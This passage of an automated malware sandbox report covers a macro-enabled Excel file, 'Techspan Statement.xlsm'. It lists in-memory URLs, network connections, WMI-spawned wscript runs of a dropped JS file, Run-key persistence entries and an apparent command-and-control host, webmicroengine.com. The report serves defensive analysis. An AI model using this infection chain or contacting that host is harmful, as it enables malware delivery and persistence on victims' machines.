Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://outlook.office365.com/connectors
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://powerlift.acompli.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://pushchannel.1drv.ms
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://res.cdn.office.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://settings.outlook.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://staging.cortana.ai
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://substrate.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://tasks.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: wscript.exe, 0000000B.00000002.3000400471.000001F1D0D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/
Source: wscript.exe, 0000000B.00000002.3000400471.000001F1D0D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/L
Source: wscript.exe, 0000000B.00000002.2985942316.000001F1CDC72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3000400471.000001F1D0D51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2981837384.000001F1CBED4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2981188579.000001F1CBDF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/index.php
Source: wscript.exe, 0000000B.00000002.2996137717.000001F1D0320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/index.phpKD$G/75MfH.O
Source: wscript.exe, 0000000B.00000002.3000400471.000001F1D0D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/index.phpQ
Source: wscript.exe, 0000000B.00000002.3000400471.000001F1D0D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/index.phpR
Source: wscript.exe, 0000000B.00000002.3000400471.000001F1D0D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/index.phpW
Source: wscript.exe, 0000000A.00000002.2894683056.000002C64D931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/index.phpp
Source: wscript.exe, 0000000B.00000002.2996137717.000001F1D0320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webmicroengine.com/index.phpqDUZB
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://webshell.suite.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://wus2.contentsync.
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://www.yammer.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 190.123.45.87:443 -> 192.168.2.16:49739 version: TLS 1.2

System Summary

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\5DWDMMR9NH2K.JSJump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe //b "C:\Users\user\5DWDMMR9NH2K.JS"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\OracleX\5DWDMMR9NH2K.JS
Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe //b "C:\Users\user\5DWDMMR9NH2K.JS"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\OracleX\5DWDMMR9NH2K.JSJump to behavior
Source: rule324001v3.xml.0.drOLE indicator, VBA macros: true
Source: rule324002v3.xml.0.drOLE indicator, VBA macros: true
Source: rule324003v3.xml.0.drOLE indicator, VBA macros: true
Source: rule324005v1.xml.0.drOLE indicator, VBA macros: true
Source: rule324006v1.xml.0.drOLE indicator, VBA macros: true
Source: rule324007v1.xml.0.drOLE indicator, VBA macros: true
Source: rule324008v1.xml.0.drOLE indicator, VBA macros: true
Source: rule63067v4.xml.0.drOLE indicator, VBA macros: true
Source: rule324010v1.xml.0.drOLE indicator, VBA macros: true
Source: rule324009v1.xml.0.drOLE indicator, VBA macros: true
Source: CatalogCacheMetaData.xml.0.drOLE indicator, VBA macros: true
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drOLE indicator, VBA macros: true
Source: rule324001v3.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule324002v3.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule324003v3.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule324005v1.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule324006v1.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule324007v1.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule324008v1.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule63067v4.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule324010v1.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: rule324009v1.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: CatalogCacheMetaData.xml.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal88.expl.evad.winXLSM@8/41@4/5
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Techspan Statement.xlsmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{1FE379B5-EA86-49AD-9BE5-325FD9659D9E} - OProcSessId.datJump to behavior
Source: 5AA20000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Techspan Statement.xlsm
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe //b "C:\Users\user\5DWDMMR9NH2K.JS"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\OracleX\5DWDMMR9NH2K.JS
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe //b "C:\Users\user\5DWDMMR9NH2K.JS"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\OracleX\5DWDMMR9NH2K.JSJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
Source: 9YMF2RVFA4BY.LNK.0.drLNK file: ..\..\..\..\..\..\..\9YMF2RVFA4BY.xlsx
Source: Techspan Statement.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Techspan Statement.xlsm
Source: Local Disk (C).LNK.0.drLNK file: ..\..\..\..\..\..\..
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: 5AA20000.0.drInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5DWDMMR9NH2KJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5DWDMMR9NH2KJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5DWDMMR9NH2KJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5DWDMMR9NH2KJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
